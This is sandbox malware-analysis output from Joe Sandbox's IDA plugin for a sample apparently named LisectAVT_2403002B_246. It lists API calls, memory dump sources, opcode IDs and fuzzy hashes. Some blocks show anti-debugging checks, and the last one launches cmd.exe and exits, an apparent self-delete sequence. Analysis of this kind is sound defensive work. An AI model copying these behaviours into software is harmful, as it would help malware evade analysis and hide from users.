                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFile$FirstNext
                                                                              • String ID:
                                                                              • API String ID: 1164774033-0
                                                                              • Opcode ID: f7be413c32b10d5d77361bf470f8acb6f8a31dbea050650fe0d88790ffd5ce58
                                                                              • Instruction ID: d83ab35b066e3409615360500129e326f57a3ce71fe0c260cc5fa70092658777
                                                                              • Opcode Fuzzy Hash: f7be413c32b10d5d77361bf470f8acb6f8a31dbea050650fe0d88790ffd5ce58
                                                                              • Instruction Fuzzy Hash: 5871E17190919C9EDF20EF269C89AFABBB9AB05304F1461D9E04DB7251EA308E859F50
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EDA423
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00EDA4EF
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EDA50F
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00EDA519
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 254469556-0
                                                                              • Opcode ID: 37a41484a84c635d6072dada67b19ab70a407971891d87035f62b74a210a8514
                                                                              • Instruction ID: 508bf0cd3a09470b10e4c8d07faeb80d08bbd87c4a13a7b293e50fcd063b5cc3
                                                                              • Opcode Fuzzy Hash: 37a41484a84c635d6072dada67b19ab70a407971891d87035f62b74a210a8514
                                                                              • Instruction Fuzzy Hash: 42310675D41218DBDB10DFA4D989BCDBBB8EF08304F1040AAE50CAB250EB709B89CF05
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF0FB7
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF1001
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF10C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 661929714-0
                                                                              • Opcode ID: 7598ea1e3cd5a319e246162cb7f07ea053b7f9749b4ce9cb6a1bfee1062cbfa9
                                                                              • Instruction ID: 86f5c52d6697fa547c11e57c43cb4cb5edfa718ad3689f2a3e33599859e11878
                                                                              • Opcode Fuzzy Hash: 7598ea1e3cd5a319e246162cb7f07ea053b7f9749b4ce9cb6a1bfee1062cbfa9
                                                                              • Instruction Fuzzy Hash: 1861DE7190120FDFEB289F28CD92BBA77A8EF14304F1051B9EA15E6685FB74D991CB10
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00ED112E), ref: 00EE1119
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00ED112E), ref: 00EE1123
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00ED112E), ref: 00EE1130
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: cb8e56eeca979682a3b3231f6e78e1a55eb844f68d5741b8c89d8b4a1bffc3bd
                                                                              • Instruction ID: c2a66b36e4d55d5e9e325792a776d76c9db1e72bad9d029d3df94702b3d199d9
                                                                              • Opcode Fuzzy Hash: cb8e56eeca979682a3b3231f6e78e1a55eb844f68d5741b8c89d8b4a1bffc3bd
                                                                              • Instruction Fuzzy Hash: AE31C27490122CABCF21DF25D989B9DBBB8BF08710F5051EAE51CA6260EB709F85CF45
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EEBBE2,?,?,00000008,?,?,00EF4ECA,00000000), ref: 00EEBE14
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: e0ee08b9f3a1258131092f5e996473b02f211038d467fdc5f5f0f515fe181607
                                                                              • Instruction ID: 8beb236ef4324ce3415551c7dc5eb1034f4a47ccbde4956fed9fafa68a4be91d
                                                                              • Opcode Fuzzy Hash: e0ee08b9f3a1258131092f5e996473b02f211038d467fdc5f5f0f515fe181607
                                                                              • Instruction Fuzzy Hash: 08B18D3121064DCFD719CF29C48ABA67BE0FF04368F299658E999DF2A1C335E981CB40
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EDA69B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: FeaturePresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 2325560087-0
                                                                              • Opcode ID: 4cdb24cfda05d581195cc33ca2cec21795a348caa5a991a9d1a116acfbd7617d
                                                                              • Instruction ID: 048f8c3c4a3970c2b1984b586268f6cdb213852a3ef33c9f2486879882c63030
                                                                              • Opcode Fuzzy Hash: 4cdb24cfda05d581195cc33ca2cec21795a348caa5a991a9d1a116acfbd7617d
                                                                              • Instruction Fuzzy Hash: 8D5189B1D056098FDB29CFA5E8853AABBF1FB04314F18856BC445EB350D774AE02CB51
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EF120A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 3736152602-0
                                                                              • Opcode ID: 0394534f95c488e36e2433d0e9d000d3f9e89d13619eac66d882f6c1769db125
                                                                              • Instruction ID: 50b2d7c56bb8705b8b0235540d7f4a61397c1b266a2073096681f9fcb613fc5a
                                                                              • Opcode Fuzzy Hash: 0394534f95c488e36e2433d0e9d000d3f9e89d13619eac66d882f6c1769db125
                                                                              • Instruction Fuzzy Hash: 8421D33261420EABEF189B65DC41ABB33E8EF45318F1020BAFE01E6151EB35ED049750
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 53fc89e0f23fc064f9aa056bf584d7fcf65298c4efc33ee41c171cefc7d6d7b1
                                                                              • Instruction ID: 89873e0a05e9164e1262057d5ea2647504c9d6d0f1a0f0ddfaf0afbb8caa315f
                                                                              • Opcode Fuzzy Hash: 53fc89e0f23fc064f9aa056bf584d7fcf65298c4efc33ee41c171cefc7d6d7b1
                                                                              • Instruction Fuzzy Hash: CDC1B33050064A8ECB24CF68C5847BAB7B2EF06318F24662BD857BB792D371AD47CB50
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • EnumSystemLocalesW.KERNEL32(00EF0F63,00000001), ref: 00EF0EAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                              • String ID:
                                                                              • API String ID: 2417226690-0
                                                                              • Opcode ID: dba272f3ebb5d24feb449031a0bfd24f1c150efa75f226c9023b2ab4c5c93634
                                                                              • Instruction ID: bdf74e3e74000ac6fc0fa58fab35e23c15ffda6d70619ccb8b7b055aa1ec5f3f
                                                                              • Opcode Fuzzy Hash: dba272f3ebb5d24feb449031a0bfd24f1c150efa75f226c9023b2ab4c5c93634
                                                                              • Instruction Fuzzy Hash: D2114C376043099FDF289F39C8A167AB791FF84358B14482CEA8797A41D3717802C740
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EF117F,00000000,00000000,?), ref: 00EF1411
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 3736152602-0
                                                                              • Opcode ID: fd59da17ee2276692fb03fdb516e2e04c543a8fa1fff951ef4e141dccde81b2d
                                                                              • Instruction ID: fd83231f287ddcc9b7ba03d260910bff3ef597e25df112102879dd9f36870c4a
                                                                              • Opcode Fuzzy Hash: fd59da17ee2276692fb03fdb516e2e04c543a8fa1fff951ef4e141dccde81b2d
                                                                              • Instruction Fuzzy Hash: AC01D63260011EEFDB2C5A258805BFB3799DB80358F154468EE2AB3180EA30FD41C690
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • EnumSystemLocalesW.KERNEL32(00EF11B6,00000001), ref: 00EF0F22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                              • String ID:
                                                                              • API String ID: 2417226690-0
                                                                              • Opcode ID: 28a208391370ab3dd23a6154d0c85e909c64769ce3e6773af884663cd48e2f6d
                                                                              • Instruction ID: 3735135ccdd89e9aed70e198d1ead94f96aad1a93252e2056cd17dd5eddedca8
                                                                              • Opcode Fuzzy Hash: 28a208391370ab3dd23a6154d0c85e909c64769ce3e6773af884663cd48e2f6d
                                                                              • Instruction Fuzzy Hash: B5F0CD3631030C5FDB24AF399881A7A7B91EB80368B05442CFB45AB692DAB1AC42CA50
                                                                              APIs
                                                                                • Part of subcall function 00EE12EA: EnterCriticalSection.KERNEL32(-0002A967,?,00EE5EE7,?,00F059E0,00000008,00EE60AB,?,00EDDD01,?,?,00EDDD01,00ED112E,?,00EE119E), ref: 00EE12F9
                                                                              • EnumSystemLocalesW.KERNEL32(Function_000178EC,00000001,00F05B00,0000000C,00EE7D21,?), ref: 00EE7931
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                              • String ID:
                                                                              • API String ID: 1272433827-0
                                                                              • Opcode ID: bc5d0ccf3ec6a907b7b0dd91f1e89a7c295634637d4ff79bd44a5204161fbe39
                                                                              • Instruction ID: 8540dbf817cf9526056aef2b96c7f9ba6ebc3961c8544850fff248d77a042a20
                                                                              • Opcode Fuzzy Hash: bc5d0ccf3ec6a907b7b0dd91f1e89a7c295634637d4ff79bd44a5204161fbe39
                                                                              • Instruction Fuzzy Hash: C0F03C72A04208DFD700EF99EC06B5D77F0FB48761F00915AF510A72A0CB755905DF51
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • EnumSystemLocalesW.KERNEL32(00EF0D4B,00000001), ref: 00EF0E29
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                              • String ID:
                                                                              • API String ID: 2417226690-0
                                                                              • Opcode ID: 81f30e786ebf43d07cc17f038a2e05f6ea39f0546d7523294e3d1e793a5ffb28
                                                                              • Instruction ID: c376812dbd9a473324e913af59662f05719b1470787dc4275f69e30912f52c15
                                                                              • Opcode Fuzzy Hash: 81f30e786ebf43d07cc17f038a2e05f6ea39f0546d7523294e3d1e793a5ffb28
                                                                              • Instruction Fuzzy Hash: 58F0E53A3002099BCF04AF76D85567B7F94EFD1764B064059EF099B252C6719943C790
                                                                              APIs
                                                                                • Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
                                                                                • Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5
                                                                              • EnumSystemLocalesW.KERNEL32(00EF0D4B,00000001), ref: 00EF0E29
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                              • String ID:
                                                                              • API String ID: 2417226690-0
                                                                              • Opcode ID: 1c7288e730939166e50aabc00cfc73e5e715160666cde1dc74a90fea9b7b5444
                                                                              • Instruction ID: ff1717625507a4c77a1c49e62cc7cbc8347afcf4c33a4238ce76430e9395590a
                                                                              • Opcode Fuzzy Hash: 1c7288e730939166e50aabc00cfc73e5e715160666cde1dc74a90fea9b7b5444
                                                                              • Instruction Fuzzy Hash: 0CF0E53A3002099BCF04AF76D85567A7F94EFD1764B064059EF099B251C6719943C790
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00EE4B8F,?,20001004,00000000,00000002,?,?,00EE4181), ref: 00EE7E59
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 6c2ee267c931d68d2bb74a548080dfd14e89de62341288431de427c8f82521d1
                                                                              • Instruction ID: d35ec20cf4857362cd556e3aa4b1110a9d8378d22f38b277aac9a836d4bc0e52
                                                                              • Opcode Fuzzy Hash: 6c2ee267c931d68d2bb74a548080dfd14e89de62341288431de427c8f82521d1
                                                                              • Instruction Fuzzy Hash: EEE04F3150525CBBCF122F62ED04AAE7F56EF84750F145415FD8575231CB329D21EA94
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000A586,00ED9D6B), ref: 00EDA57F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 74d646b0f8578e9293972ba44176960c2e12bc017aa2d7f7b4fb1b99fa45da80
                                                                              • Instruction ID: aee6ef67dd8ca146ba7aaab08770d1e29783ff63493eaac2986b6ab8514c7a28
                                                                              • Opcode Fuzzy Hash: 74d646b0f8578e9293972ba44176960c2e12bc017aa2d7f7b4fb1b99fa45da80
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 11f58221df90ba892cafb2b83314f9da67c386ddaa751dc5a209192bf12790a1
                                                                              • Instruction ID: d5d8bc405ef5ee41c5db3890f5d0bbd10487bd90e49d463220e1671ab9a7bcb3
                                                                              • Opcode Fuzzy Hash: 11f58221df90ba892cafb2b83314f9da67c386ddaa751dc5a209192bf12790a1
                                                                              • Instruction Fuzzy Hash: CAA011303022028FAB808F32AB082083AB8ABA02C0300802AA008C80A0EE20800AAF00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e407ad32b83847db325435d64b71cf4bc587cc9990830d61addc74c018830c0
                                                                              • Instruction ID: 495a30f4a3bf306cc87e7fa75d38d22621d51862d29dba088cad07a784f0bd61
                                                                              • Opcode Fuzzy Hash: 2e407ad32b83847db325435d64b71cf4bc587cc9990830d61addc74c018830c0
                                                                              • Instruction Fuzzy Hash: CF322821D29F494DD7239636C922335A258AFB73C4F35E737E81AB5AA6EB29C4834100
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 00ED2E5E
                                                                              • SetPriorityClass.KERNEL32(00000000), ref: 00ED2E65
                                                                              • GetCurrentThread.KERNEL32 ref: 00ED2E6D
                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 00ED2E74
                                                                              • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00ED2E88
                                                                              • _fwprintf.LIBCONCRTD ref: 00ED2EA2
                                                                                • Part of subcall function 00ED1170: _fread.LIBCMTD ref: 00ED118A
                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00ED2EC1
                                                                              • ExitProcess.KERNEL32 ref: 00ED2EC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
